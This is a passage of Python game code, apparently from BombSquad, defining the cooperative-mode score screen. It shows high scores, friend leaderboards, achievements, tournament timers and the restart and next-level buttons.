import StoreButton\n from bastd.ui.league.rankbutton import LeagueRankButton\n\n\nclass CoopScoreScreen(ba.Activity[ba.Player, ba.Team]):\n \"\"\"Score screen showing the results of a cooperative game.\"\"\"\n\n def __init__(self, settings: dict):\n # pylint: disable=too-many-statements\n super().__init__(settings)\n\n # Keep prev activity alive while we fade in\n self.transition_time = 0.5\n self.inherits_tint = True\n self.inherits_vr_camera_offset = True\n self.inherits_music = True\n self.use_fixed_vr_overlay = True\n\n self._do_new_rating: bool = self.session.tournament_id is not None\n\n self._score_display_sound = ba.getsound('scoreHit01')\n self._score_display_sound_small = ba.getsound('scoreHit02')\n self.drum_roll_sound = ba.getsound('drumRoll')\n self.cymbal_sound = ba.getsound('cymbal')\n\n # These get used in UI bits so need to load them in the UI context.\n with ba.Context('ui'):\n self._replay_icon_texture = ba.gettexture('replayIcon')\n self._menu_icon_texture = ba.gettexture('menuIcon')\n self._next_level_icon_texture = ba.gettexture('nextLevelIcon')\n\n self._campaign: ba.Campaign = settings['campaign']\n\n self._have_achievements = bool(\n get_achievements_for_coop_level(self._campaign.name + ':' +\n settings['level']))\n\n self._account_type = (_ba.get_account_type() if\n _ba.get_account_state() == 'signed_in' else None)\n\n self._game_service_icon_color: Optional[Sequence[float]]\n self._game_service_achievements_texture: Optional[ba.Texture]\n self._game_service_leaderboards_texture: Optional[ba.Texture]\n\n with ba.Context('ui'):\n if self._account_type == 'Game Center':\n self._game_service_icon_color = (1.0, 1.0, 1.0)\n icon = ba.gettexture('gameCenterIcon')\n self._game_service_achievements_texture = icon\n self._game_service_leaderboards_texture = icon\n self._account_has_achievements = True\n elif self._account_type == 'Game Circle':\n icon = ba.gettexture('gameCircleIcon')\n self._game_service_icon_color = (1, 1, 1)\n self._game_service_achievements_texture = icon\n self._game_service_leaderboards_texture = icon\n self._account_has_achievements = True\n elif self._account_type == 'Google Play':\n self._game_service_icon_color = (0.8, 1.0, 0.6)\n 
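# Google Play uses separate art for the achievements and leaderboards buttons.\n                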
self._game_service_achievements_texture = (\n ba.gettexture('googlePlayAchievementsIcon'))\n self._game_service_leaderboards_texture = (\n ba.gettexture('googlePlayLeaderboardsIcon'))\n self._account_has_achievements = True\n else:\n self._game_service_icon_color = None\n self._game_service_achievements_texture = None\n self._game_service_leaderboards_texture = None\n self._account_has_achievements = False\n\n self._cashregistersound = ba.getsound('cashRegister')\n self._gun_cocking_sound = ba.getsound('gunCocking')\n self._dingsound = ba.getsound('ding')\n self._score_link: Optional[str] = None\n self._root_ui: Optional[ba.Widget] = None\n self._background: Optional[ba.Actor] = None\n self._old_best_rank = 0.0\n self._game_name_str: Optional[str] = None\n self._game_config_str: Optional[str] = None\n\n # Ui bits.\n self._corner_button_offs: Optional[Tuple[float, float]] = None\n self._league_rank_button: Optional[LeagueRankButton] = None\n self._store_button_instance: Optional[StoreButton] = None\n self._restart_button: Optional[ba.Widget] = None\n self._update_corner_button_positions_timer: Optional[ba.Timer] = None\n self._next_level_error: Optional[ba.Actor] = None\n\n # Score/gameplay bits.\n self._was_complete: Optional[bool] = None\n self._is_complete: Optional[bool] = None\n self._newly_complete: Optional[bool] = None\n self._is_more_levels: Optional[bool] = None\n self._next_level_name: Optional[str] = None\n self._show_friend_scores: Optional[bool] = None\n self._show_info: Optional[Dict[str, Any]] = None\n self._name_str: Optional[str] = None\n self._friends_loading_status: Optional[ba.Actor] = None\n self._score_loading_status: Optional[ba.Actor] = None\n self._tournament_time_remaining: Optional[float] = None\n self._tournament_time_remaining_text: Optional[Text] = None\n self._tournament_time_remaining_text_timer: Optional[ba.Timer] = None\n\n self._playerinfos: List[ba.PlayerInfo] = settings['playerinfos']\n assert isinstance(self._playerinfos, list)\n assert (isinstance(i, ba.PlayerInfo) for i in self._playerinfos)\n\n self._score: Optional[int] = settings['score']\n assert isinstance(self._score, (int, type(None)))\n\n self._fail_message: Optional[ba.Lstr] = settings['fail_message']\n assert isinstance(self._fail_message, (ba.Lstr, type(None)))\n\n self._begin_time: Optional[float] = None\n\n self._score_order: str\n if 'score_order' in settings:\n if not settings['score_order'] in ['increasing', 'decreasing']:\n raise ValueError('Invalid score order: ' +\n settings['score_order'])\n self._score_order = settings['score_order']\n else:\n self._score_order = 'increasing'\n assert isinstance(self._score_order, str)\n\n self._score_type: str\n if 'score_type' in settings:\n if not settings['score_type'] in ['points', 'time']:\n raise ValueError('Invalid score type: ' +\n settings['score_type'])\n self._score_type = settings['score_type']\n else:\n self._score_type = 'points'\n assert isinstance(self._score_type, str)\n\n self._level_name: str = settings['level']\n assert isinstance(self._level_name, str)\n\n self._game_name_str = self._campaign.name + ':' + self._level_name\n self._game_config_str = str(len(\n self._playerinfos)) + 'p' + self._campaign.getlevel(\n self._level_name).get_score_version_string().replace(' ', '_')\n\n # If game-center/etc scores are available we show our friends'\n # scores. 
Otherwise we show our local high scores.\n self._show_friend_scores = _ba.game_service_has_leaderboard(\n self._game_name_str, self._game_config_str)\n\n try:\n self._old_best_rank = self._campaign.getlevel(\n self._level_name).rating\n except Exception:\n self._old_best_rank = 0.0\n\n self._victory: bool = settings['outcome'] == 'victory'\n\n def __del__(self) -> None:\n super().__del__()\n\n # If our UI is still up, kill it.\n if self._root_ui:\n with ba.Context('ui'):\n ba.containerwidget(edit=self._root_ui, transition='out_left')\n\n def on_transition_in(self) -> None:\n from bastd.actor import background # FIXME NO BSSTD\n ba.set_analytics_screen('Coop Score Screen')\n super().on_transition_in()\n self._background = background.Background(fade_time=0.45,\n start_faded=False,\n show_logo=True)\n\n def _ui_menu(self) -> None:\n from bastd.ui import specialoffer\n if specialoffer.show_offer():\n return\n ba.containerwidget(edit=self._root_ui, transition='out_left')\n with ba.Context(self):\n ba.timer(0.1, ba.Call(ba.WeakCall(self.session.end)))\n\n def _ui_restart(self) -> None:\n from bastd.ui.tournamententry import TournamentEntryWindow\n from bastd.ui import specialoffer\n if specialoffer.show_offer():\n return\n\n # If we're in a tournament and it looks like there's no time left,\n # disallow.\n if self.session.tournament_id is not None:\n if self._tournament_time_remaining is None:\n ba.screenmessage(\n ba.Lstr(resource='tournamentCheckingStateText'),\n color=(1, 0, 0))\n ba.playsound(ba.getsound('error'))\n return\n if self._tournament_time_remaining <= 0:\n ba.screenmessage(ba.Lstr(resource='tournamentEndedText'),\n color=(1, 0, 0))\n ba.playsound(ba.getsound('error'))\n return\n\n # If there are currently fewer players than our session min,\n # don't allow.\n if len(self.players) < self.session.min_players:\n ba.screenmessage(ba.Lstr(resource='notEnoughPlayersRemainingText'),\n color=(1, 0, 0))\n ba.playsound(ba.getsound('error'))\n return\n\n self._campaign.set_selected_level(self._level_name)\n\n # If this is a tournament, go back to the tournament-entry UI\n # otherwise just hop back in.\n tournament_id = self.session.tournament_id\n if tournament_id is not None:\n assert self._restart_button is not None\n TournamentEntryWindow(\n tournament_id=tournament_id,\n tournament_activity=self,\n position=self._restart_button.get_screen_space_center())\n else:\n ba.containerwidget(edit=self._root_ui, transition='out_left')\n self.can_show_ad_on_death = True\n with ba.Context(self):\n self.end({'outcome': 'restart'})\n\n def _ui_next(self) -> None:\n from bastd.ui.specialoffer import show_offer\n if show_offer():\n return\n\n # If we didn't just complete this level but are choosing to play the\n # next one, set it as current (this won't happen otherwise).\n if (self._is_complete and self._is_more_levels\n and not self._newly_complete):\n assert self._next_level_name is not None\n self._campaign.set_selected_level(self._next_level_name)\n ba.containerwidget(edit=self._root_ui, transition='out_left')\n with ba.Context(self):\n self.end({'outcome': 'next_level'})\n\n def _ui_gc(self) -> None:\n _ba.show_online_score_ui('leaderboard',\n game=self._game_name_str,\n game_version=self._game_config_str)\n\n def _ui_show_achievements(self) -> None:\n _ba.show_online_score_ui('achievements')\n\n def _ui_worlds_best(self) -> None:\n if self._score_link is None:\n ba.playsound(ba.getsound('error'))\n ba.screenmessage(ba.Lstr(resource='scoreListUnavailableText'),\n color=(1, 0.5, 0))\n else:\n 
ba.open_url(self._score_link)\n\n def _ui_error(self) -> None:\n with ba.Context(self):\n self._next_level_error = Text(\n ba.Lstr(resource='completeThisLevelToProceedText'),\n flash=True,\n maxwidth=360,\n scale=0.54,\n h_align=Text.HAlign.CENTER,\n color=(0.5, 0.7, 0.5, 1),\n position=(300, -235))\n ba.playsound(ba.getsound('error'))\n ba.timer(\n 2.0,\n ba.WeakCall(self._next_level_error.handlemessage,\n ba.DieMessage()))\n\n def _should_show_worlds_best_button(self) -> bool:\n # Link is too complicated to display with no browser.\n return ba.is_browser_likely_available()\n\n def request_ui(self) -> None:\n \"\"\"Set up a callback to show our UI at the next opportune time.\"\"\"\n # We don't want to just show our UI in case the user already has the\n # main menu up, so instead we add a callback for when the menu\n # closes; if we're still alive, we'll come up then.\n # If there's no main menu this gets called immediately.\n ba.app.add_main_menu_close_callback(ba.WeakCall(self.show_ui))\n\n def show_ui(self) -> None:\n \"\"\"Show the UI for restarting, playing the next Level, etc.\"\"\"\n # pylint: disable=too-many-locals\n from bastd.ui.store.button import StoreButton\n from bastd.ui.league.rankbutton import LeagueRankButton\n\n delay = 0.7 if (self._score is not None) else 0.0\n\n # If there's no players left in the game, lets not show the UI\n # (that would allow restarting the game with zero players, etc).\n if not self.players:\n return\n\n rootc = self._root_ui = ba.containerwidget(size=(0, 0),\n transition='in_right')\n\n h_offs = 7.0\n v_offs = -280.0\n\n # We wanna prevent controllers users from popping up browsers\n # or game-center widgets in cases where they can't easily get back\n # to the game (like on mac).\n can_select_extra_buttons = ba.app.platform == 'android'\n\n _ba.set_ui_input_device(None) # Menu is up for grabs.\n\n if self._show_friend_scores:\n ba.buttonwidget(parent=rootc,\n color=(0.45, 0.4, 0.5),\n position=(h_offs - 520, v_offs + 480),\n size=(300, 60),\n label=ba.Lstr(resource='topFriendsText'),\n on_activate_call=ba.WeakCall(self._ui_gc),\n transition_delay=delay + 0.5,\n icon=self._game_service_leaderboards_texture,\n icon_color=self._game_service_icon_color,\n autoselect=True,\n selectable=can_select_extra_buttons)\n\n if self._have_achievements and self._account_has_achievements:\n ba.buttonwidget(parent=rootc,\n color=(0.45, 0.4, 0.5),\n position=(h_offs - 520, v_offs + 450 - 235 + 40),\n size=(300, 60),\n label=ba.Lstr(resource='achievementsText'),\n on_activate_call=ba.WeakCall(\n self._ui_show_achievements),\n transition_delay=delay + 1.5,\n icon=self._game_service_achievements_texture,\n icon_color=self._game_service_icon_color,\n autoselect=True,\n selectable=can_select_extra_buttons)\n\n if self._should_show_worlds_best_button():\n ba.buttonwidget(\n parent=rootc,\n color=(0.45, 0.4, 0.5),\n position=(160, v_offs + 480),\n size=(350, 62),\n label=ba.Lstr(resource='tournamentStandingsText')\n if self.session.tournament_id is not None else ba.Lstr(\n resource='worldsBestScoresText') if self._score_type\n == 'points' else ba.Lstr(resource='worldsBestTimesText'),\n autoselect=True,\n on_activate_call=ba.WeakCall(self._ui_worlds_best),\n transition_delay=delay + 1.9,\n selectable=can_select_extra_buttons)\n else:\n pass\n\n show_next_button = self._is_more_levels and not ba.app.kiosk_mode\n\n if not show_next_button:\n h_offs += 70\n\n menu_button = ba.buttonwidget(parent=rootc,\n autoselect=True,\n position=(h_offs - 130 - 60, v_offs),\n size=(110, 
85),\n label='',\n on_activate_call=ba.WeakCall(\n self._ui_menu))\n ba.imagewidget(parent=rootc,\n draw_controller=menu_button,\n position=(h_offs - 130 - 60 + 22, v_offs + 14),\n size=(60, 60),\n texture=self._menu_icon_texture,\n opacity=0.8)\n self._restart_button = restart_button = ba.buttonwidget(\n parent=rootc,\n autoselect=True,\n position=(h_offs - 60, v_offs),\n size=(110, 85),\n label='',\n on_activate_call=ba.WeakCall(self._ui_restart))\n ba.imagewidget(parent=rootc,\n draw_controller=restart_button,\n position=(h_offs - 60 + 19, v_offs + 7),\n size=(70, 70),\n texture=self._replay_icon_texture,\n opacity=0.8)\n\n next_button: Optional[ba.Widget] = None\n\n # Our 'next' button is disabled if we haven't unlocked the next\n # level yet and invisible if there is none.\n if show_next_button:\n if self._is_complete:\n call = ba.WeakCall(self._ui_next)\n button_sound = True\n image_opacity = 0.8\n color = None\n else:\n call = ba.WeakCall(self._ui_error)\n button_sound = False\n image_opacity = 0.2\n color = (0.3, 0.3, 0.3)\n next_button = ba.buttonwidget(parent=rootc,\n autoselect=True,\n position=(h_offs + 130 - 60, v_offs),\n size=(110, 85),\n label='',\n on_activate_call=call,\n color=color,\n enable_sound=button_sound)\n ba.imagewidget(parent=rootc,\n draw_controller=next_button,\n position=(h_offs + 130 - 60 + 12, v_offs + 5),\n size=(80, 80),\n texture=self._next_level_icon_texture,\n opacity=image_opacity)\n\n x_offs_extra = 0 if show_next_button else -100\n self._corner_button_offs = (h_offs + 300.0 + 100.0 + x_offs_extra,\n v_offs + 560.0)\n\n if ba.app.kiosk_mode:\n self._league_rank_button = None\n self._store_button_instance = None\n else:\n self._league_rank_button = LeagueRankButton(\n parent=rootc,\n position=(h_offs + 300 + 100 + x_offs_extra, v_offs + 560),\n size=(100, 60),\n scale=0.9,\n color=(0.4, 0.4, 0.9),\n textcolor=(0.9, 0.9, 2.0),\n transition_delay=0.0,\n smooth_update_delay=5.0)\n self._store_button_instance = StoreButton(\n parent=rootc,\n position=(h_offs + 400 + 100 + x_offs_extra, v_offs + 560),\n show_tickets=True,\n sale_scale=0.85,\n size=(100, 60),\n scale=0.9,\n button_type='square',\n color=(0.35, 0.25, 0.45),\n textcolor=(0.9, 0.7, 1.0),\n transition_delay=0.0)\n\n ba.containerwidget(edit=rootc,\n selected_child=next_button if\n (self._newly_complete and self._victory\n and show_next_button) else restart_button,\n on_cancel_call=menu_button.activate)\n\n self._update_corner_button_positions()\n self._update_corner_button_positions_timer = ba.Timer(\n 1.0,\n ba.WeakCall(self._update_corner_button_positions),\n repeat=True,\n timetype=ba.TimeType.REAL)\n\n def _update_corner_button_positions(self) -> None:\n offs = -55 if _ba.is_party_icon_visible() else 0\n assert self._corner_button_offs is not None\n pos_x = self._corner_button_offs[0] + offs\n pos_y = self._corner_button_offs[1]\n if self._league_rank_button is not None:\n self._league_rank_button.set_position((pos_x, pos_y))\n if self._store_button_instance is not None:\n self._store_button_instance.set_position((pos_x + 100, pos_y))\n\n def on_begin(self) -> None:\n # FIXME: Clean this up.\n # pylint: disable=too-many-statements\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-locals\n super().on_begin()\n\n self._begin_time = ba.time()\n\n # Calc whether the level is complete and other stuff.\n levels = self._campaign.levels\n level = self._campaign.getlevel(self._level_name)\n self._was_complete = level.complete\n self._is_complete = (self._was_complete or 
self._victory)\n self._newly_complete = (self._is_complete and not self._was_complete)\n self._is_more_levels = ((level.index < len(levels) - 1)\n and self._campaign.sequential)\n\n # Any time we complete a level, set the next one as unlocked.\n if self._is_complete and self._is_more_levels:\n _ba.add_transaction({\n 'type': 'COMPLETE_LEVEL',\n 'campaign': self._campaign.name,\n 'level': self._level_name\n })\n self._next_level_name = levels[level.index + 1].name\n\n # If this is the first time we completed it, set the next one\n # as current.\n if self._newly_complete:\n cfg = ba.app.config\n cfg['Selected Coop Game'] = (self._campaign.name + ':' +\n self._next_level_name)\n cfg.commit()\n self._campaign.set_selected_level(self._next_level_name)\n\n ba.timer(1.0, ba.WeakCall(self.request_ui))\n\n if (self._is_complete and self._victory and self._is_more_levels\n and not ba.app.kiosk_mode):\n Text(ba.Lstr(value='${A}:\\n',\n subs=[('${A}', ba.Lstr(resource='levelUnlockedText'))\n ]) if self._newly_complete else\n ba.Lstr(value='${A}:\\n',\n subs=[('${A}', ba.Lstr(resource='nextLevelText'))]),\n transition=Text.Transition.IN_RIGHT,\n transition_delay=5.2,\n flash=self._newly_complete,\n scale=0.54,\n h_align=Text.HAlign.CENTER,\n maxwidth=270,\n color=(0.5, 0.7, 0.5, 1),\n position=(270, -235)).autoretain()\n assert self._next_level_name is not None\n Text(ba.Lstr(translate=('coopLevelNames', self._next_level_name)),\n transition=Text.Transition.IN_RIGHT,\n transition_delay=5.2,\n flash=self._newly_complete,\n scale=0.7,\n h_align=Text.HAlign.CENTER,\n maxwidth=205,\n color=(0.5, 0.7, 0.5, 1),\n position=(270, -255)).autoretain()\n if self._newly_complete:\n ba.timer(5.2, ba.Call(ba.playsound, self._cashregistersound))\n ba.timer(5.2, ba.Call(ba.playsound, self._dingsound))\n\n offs_x = -195\n if len(self._playerinfos) > 1:\n pstr = ba.Lstr(value='- ${A} -',\n subs=[('${A}',\n ba.Lstr(resource='multiPlayerCountText',\n subs=[('${COUNT}',\n str(len(self._playerinfos)))\n ]))])\n else:\n pstr = ba.Lstr(value='- ${A} -',\n subs=[('${A}',\n ba.Lstr(resource='singlePlayerCountText'))])\n ZoomText(self._campaign.getlevel(self._level_name).displayname,\n maxwidth=800,\n flash=False,\n trail=False,\n color=(0.5, 1, 0.5, 1),\n h_align='center',\n scale=0.4,\n position=(0, 292),\n jitter=1.0).autoretain()\n Text(pstr,\n maxwidth=300,\n transition=Text.Transition.FADE_IN,\n scale=0.7,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n color=(0.5, 0.7, 0.5, 1),\n position=(0, 230)).autoretain()\n\n adisp = _ba.get_account_display_string()\n txt = Text(ba.Lstr(resource='waitingForHostText',\n subs=[('${HOST}', adisp)]),\n maxwidth=300,\n transition=Text.Transition.FADE_IN,\n transition_delay=8.0,\n scale=0.85,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n color=(1, 1, 0, 1),\n position=(0, -230)).autoretain()\n assert txt.node\n txt.node.client_only = True\n\n if self._score is not None:\n ba.timer(0.35,\n ba.Call(ba.playsound, self._score_display_sound_small))\n\n # Vestigial remain; this stuff should just be instance vars.\n self._show_info = {}\n\n if self._score is not None:\n ba.timer(0.8, ba.WeakCall(self._show_score_val, offs_x))\n else:\n ba.pushcall(ba.WeakCall(self._show_fail))\n\n self._name_str = name_str = ', '.join(\n [p.name for p in self._playerinfos])\n\n if self._show_friend_scores:\n self._friends_loading_status = Text(\n ba.Lstr(value='${A}...',\n subs=[('${A}', ba.Lstr(resource='loadingText'))]),\n position=(-405, 150 + 30),\n color=(1, 1, 1, 0.4),\n 
transition=Text.Transition.FADE_IN,\n scale=0.7,\n transition_delay=2.0)\n self._score_loading_status = Text(ba.Lstr(\n value='${A}...', subs=[('${A}', ba.Lstr(resource='loadingText'))]),\n position=(280, 150 + 30),\n color=(1, 1, 1, 0.4),\n transition=Text.Transition.FADE_IN,\n scale=0.7,\n transition_delay=2.0)\n\n if self._score is not None:\n ba.timer(0.4, ba.WeakCall(self._play_drumroll))\n\n # Add us to high scores, filter, and store.\n our_high_scores_all = self._campaign.getlevel(\n self._level_name).get_high_scores()\n\n our_high_scores = our_high_scores_all.setdefault(\n str(len(self._playerinfos)) + ' Player', [])\n\n if self._score is not None:\n our_score: Optional[list] = [\n self._score, {\n 'players': [{\n 'name': p.name,\n 'character': p.character\n } for p in self._playerinfos]\n }\n ]\n our_high_scores.append(our_score)\n else:\n our_score = None\n\n try:\n our_high_scores.sort(reverse=self._score_order == 'increasing',\n key=lambda x: x[0])\n except Exception:\n ba.print_exception('Error sorting scores.')\n print(f'our_high_scores: {our_high_scores}')\n\n del our_high_scores[10:]\n\n if self._score is not None:\n sver = (self._campaign.getlevel(\n self._level_name).get_score_version_string())\n _ba.add_transaction({\n 'type': 'SET_LEVEL_LOCAL_HIGH_SCORES',\n 'campaign': self._campaign.name,\n 'level': self._level_name,\n 'scoreVersion': sver,\n 'scores': our_high_scores_all\n })\n if _ba.get_account_state() != 'signed_in':\n # We expect this only in kiosk mode; complain otherwise.\n if not ba.app.kiosk_mode:\n print('got not-signed-in at score-submit; unexpected')\n if self._show_friend_scores:\n ba.pushcall(ba.WeakCall(self._got_friend_score_results, None))\n ba.pushcall(ba.WeakCall(self._got_score_results, None))\n else:\n assert self._game_name_str is not None\n assert self._game_config_str is not None\n _ba.submit_score(self._game_name_str,\n self._game_config_str,\n name_str,\n self._score,\n ba.WeakCall(self._got_score_results),\n ba.WeakCall(self._got_friend_score_results)\n if self._show_friend_scores else None,\n order=self._score_order,\n tournament_id=self.session.tournament_id,\n score_type=self._score_type,\n campaign=self._campaign.name,\n level=self._level_name)\n\n # Apply the transactions we've been adding locally.\n _ba.run_transactions()\n\n # If we're not doing the world's-best button, just show a title\n # instead.\n ts_height = 300\n ts_h_offs = 210\n v_offs = 40\n txt = Text(ba.Lstr(resource='tournamentStandingsText')\n if self.session.tournament_id is not None else ba.Lstr(\n resource='worldsBestScoresText') if self._score_type\n == 'points' else ba.Lstr(resource='worldsBestTimesText'),\n maxwidth=210,\n position=(ts_h_offs - 10, ts_height / 2 + 25 + v_offs + 20),\n transition=Text.Transition.IN_LEFT,\n v_align=Text.VAlign.CENTER,\n scale=1.2,\n transition_delay=2.2).autoretain()\n\n # If we've got a button on the server, only show this on clients.\n if self._should_show_worlds_best_button():\n assert txt.node\n txt.node.client_only = True\n\n # If we have no friend scores, display local best scores.\n if self._show_friend_scores:\n\n # Host has a button, so we need client-only text.\n ts_height = 300\n ts_h_offs = -480\n v_offs = 40\n txt = Text(ba.Lstr(resource='topFriendsText'),\n maxwidth=210,\n position=(ts_h_offs - 10,\n ts_height / 2 + 25 + v_offs + 20),\n transition=Text.Transition.IN_RIGHT,\n v_align=Text.VAlign.CENTER,\n scale=1.2,\n transition_delay=1.8).autoretain()\n assert txt.node\n txt.node.client_only = True\n else:\n\n ts_height 
= 300\n ts_h_offs = -480\n v_offs = 40\n Text(ba.Lstr(resource='yourBestScoresText') if self._score_type\n == 'points' else ba.Lstr(resource='yourBestTimesText'),\n maxwidth=210,\n position=(ts_h_offs - 10, ts_height / 2 + 25 + v_offs + 20),\n transition=Text.Transition.IN_RIGHT,\n v_align=Text.VAlign.CENTER,\n scale=1.2,\n transition_delay=1.8).autoretain()\n\n display_scores = list(our_high_scores)\n display_count = 5\n\n while len(display_scores) < display_count:\n display_scores.append((0, None))\n\n showed_ours = False\n h_offs_extra = 85 if self._score_type == 'points' else 130\n v_offs_extra = 20\n v_offs_names = 0\n scale = 1.0\n p_count = len(self._playerinfos)\n h_offs_extra -= 75\n if p_count > 1:\n h_offs_extra -= 20\n if p_count == 2:\n scale = 0.9\n elif p_count == 3:\n scale = 0.65\n elif p_count == 4:\n scale = 0.5\n times: List[Tuple[float, float]] = []\n for i in range(display_count):\n times.insert(random.randrange(0,\n len(times) + 1),\n (1.9 + i * 0.05, 2.3 + i * 0.05))\n for i in range(display_count):\n try:\n if display_scores[i][1] is None:\n name_str = '-'\n else:\n name_str = ', '.join([\n p['name'] for p in display_scores[i][1]['players']\n ])\n except Exception:\n ba.print_exception(\n f'Error calcing name_str for {display_scores}')\n name_str = '-'\n if display_scores[i] == our_score and not showed_ours:\n flash = True\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = 3.7\n tdelay2 = 3.7\n showed_ours = True\n else:\n flash = False\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = times[i][0]\n tdelay2 = times[i][1]\n Text(str(display_scores[i][0]) if self._score_type == 'points'\n else ba.timestring(display_scores[i][0] * 10,\n timeformat=ba.TimeFormat.MILLISECONDS,\n suppress_format_warning=True),\n position=(ts_h_offs + 20 + h_offs_extra,\n v_offs_extra + ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs + 11.0),\n h_align=Text.HAlign.RIGHT,\n v_align=Text.VAlign.CENTER,\n color=color0,\n flash=flash,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=tdelay1).autoretain()\n\n Text(ba.Lstr(value=name_str),\n position=(ts_h_offs + 35 + h_offs_extra,\n v_offs_extra + ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs_names + v_offs + 11.0),\n maxwidth=80.0 + 100.0 * len(self._playerinfos),\n v_align=Text.VAlign.CENTER,\n color=color1,\n flash=flash,\n scale=scale,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=tdelay2).autoretain()\n\n # Show achievements for this level.\n ts_height = -150\n ts_h_offs = -480\n v_offs = 40\n\n # Only make this if we don't have the button\n # (never want clients to see it so no need for client-only\n # version, etc).\n if self._have_achievements:\n if not self._account_has_achievements:\n Text(ba.Lstr(resource='achievementsText'),\n position=(ts_h_offs - 10,\n ts_height / 2 + 25 + v_offs + 3),\n maxwidth=210,\n host_only=True,\n transition=Text.Transition.IN_RIGHT,\n v_align=Text.VAlign.CENTER,\n scale=1.2,\n transition_delay=2.8).autoretain()\n\n assert self._game_name_str is not None\n achievements = get_achievements_for_coop_level(self._game_name_str)\n hval = -455\n vval = -100\n tdelay = 0.0\n for ach in achievements:\n ach.create_display(hval, vval + v_offs, 3.0 + tdelay)\n vval -= 55\n tdelay += 0.250\n\n ba.timer(5.0, ba.WeakCall(self._show_tips))\n\n def _play_drumroll(self) -> None:\n ba.NodeActor(\n ba.newnode('sound',\n attrs={\n 'sound': self.drum_roll_sound,\n 'positional': False,\n 'loop': False\n })).autoretain()\n\n def 
_got_friend_score_results(self, results: Optional[List[Any]]) -> None:\n\n # FIXME: tidy this up\n # pylint: disable=too-many-locals\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-statements\n # delay a bit if results come in too fast\n assert self._begin_time is not None\n base_delay = max(0, 1.9 - (ba.time() - self._begin_time))\n ts_height = 300\n ts_h_offs = -550\n v_offs = 30\n\n # Report in case of error.\n if results is None:\n self._friends_loading_status = Text(\n ba.Lstr(resource='friendScoresUnavailableText'),\n maxwidth=330,\n position=(-475, 150 + v_offs),\n color=(1, 1, 1, 0.4),\n transition=Text.Transition.FADE_IN,\n transition_delay=base_delay + 0.8,\n scale=0.7)\n return\n\n self._friends_loading_status = None\n\n # Ok, it looks like we aren't able to reliably get a just-submitted\n # result returned in the score list, so we need to look for our score\n # in this list and replace it if ours is better or add ours otherwise.\n if self._score is not None:\n our_score_entry = [self._score, 'Me', True]\n for score in results:\n if score[2]:\n if self._score_order == 'increasing':\n our_score_entry[0] = max(score[0], self._score)\n else:\n our_score_entry[0] = min(score[0], self._score)\n results.remove(score)\n break\n results.append(our_score_entry)\n results.sort(reverse=self._score_order == 'increasing',\n key=lambda x: x[0])\n\n # If we're not submitting our own score, we still want to change the\n # name of our own score to 'Me'.\n else:\n for score in results:\n if score[2]:\n score[1] = 'Me'\n break\n h_offs_extra = 80 if self._score_type == 'points' else 130\n v_offs_extra = 20\n v_offs_names = 0\n scale = 1.0\n\n # Make sure there's at least 5.\n while len(results) < 5:\n results.append([0, '-', False])\n results = results[:5]\n times: List[Tuple[float, float]] = []\n for i in range(len(results)):\n times.insert(random.randrange(0,\n len(times) + 1),\n (base_delay + i * 0.05, base_delay + 0.3 + i * 0.05))\n for i, tval in enumerate(results):\n score = int(tval[0])\n name_str = tval[1]\n is_me = tval[2]\n if is_me and score == self._score:\n flash = True\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = base_delay + 1.0\n tdelay2 = base_delay + 1.0\n else:\n flash = False\n if is_me:\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.9, 1.0, 0.9, 1.0)\n else:\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = times[i][0]\n tdelay2 = times[i][1]\n if name_str != '-':\n Text(str(score) if self._score_type == 'points' else\n ba.timestring(score * 10,\n timeformat=ba.TimeFormat.MILLISECONDS),\n position=(ts_h_offs + 20 + h_offs_extra,\n v_offs_extra + ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs + 11.0),\n h_align=Text.HAlign.RIGHT,\n v_align=Text.VAlign.CENTER,\n color=color0,\n flash=flash,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=tdelay1).autoretain()\n else:\n if is_me:\n print('Error: got empty name_str on score result:', tval)\n\n Text(ba.Lstr(value=name_str),\n position=(ts_h_offs + 35 + h_offs_extra,\n v_offs_extra + ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs_names + v_offs + 11.0),\n color=color1,\n maxwidth=160.0,\n v_align=Text.VAlign.CENTER,\n flash=flash,\n scale=scale,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=tdelay2).autoretain()\n\n def _got_score_results(self, results: Optional[Dict[str, Any]]) -> None:\n\n # FIXME: tidy this up\n # pylint: disable=too-many-locals\n # pylint: disable=too-many-branches\n # pylint: 
disable=too-many-statements\n\n # We need to manually run this in the context of our activity\n # and only if we aren't shutting down.\n # (really should make the submit_score call handle that stuff itself)\n if self.expired:\n return\n with ba.Context(self):\n # Delay a bit if results come in too fast.\n assert self._begin_time is not None\n base_delay = max(0, 2.7 - (ba.time() - self._begin_time))\n v_offs = 20\n if results is None:\n self._score_loading_status = Text(\n ba.Lstr(resource='worldScoresUnavailableText'),\n position=(230, 150 + v_offs),\n color=(1, 1, 1, 0.4),\n transition=Text.Transition.FADE_IN,\n transition_delay=base_delay + 0.3,\n scale=0.7)\n else:\n self._score_link = results['link']\n assert self._score_link is not None\n if not self._score_link.startswith('http://'):\n self._score_link = (_ba.get_master_server_address() + '/' +\n self._score_link)\n self._score_loading_status = None\n if 'tournamentSecondsRemaining' in results:\n secs_remaining = results['tournamentSecondsRemaining']\n assert isinstance(secs_remaining, int)\n self._tournament_time_remaining = secs_remaining\n self._tournament_time_remaining_text_timer = ba.Timer(\n 1.0,\n ba.WeakCall(\n self._update_tournament_time_remaining_text),\n repeat=True,\n timetype=ba.TimeType.BASE)\n\n assert self._show_info is not None\n self._show_info['results'] = results\n if results is not None:\n if results['tops'] != '':\n self._show_info['tops'] = results['tops']\n else:\n self._show_info['tops'] = []\n offs_x = 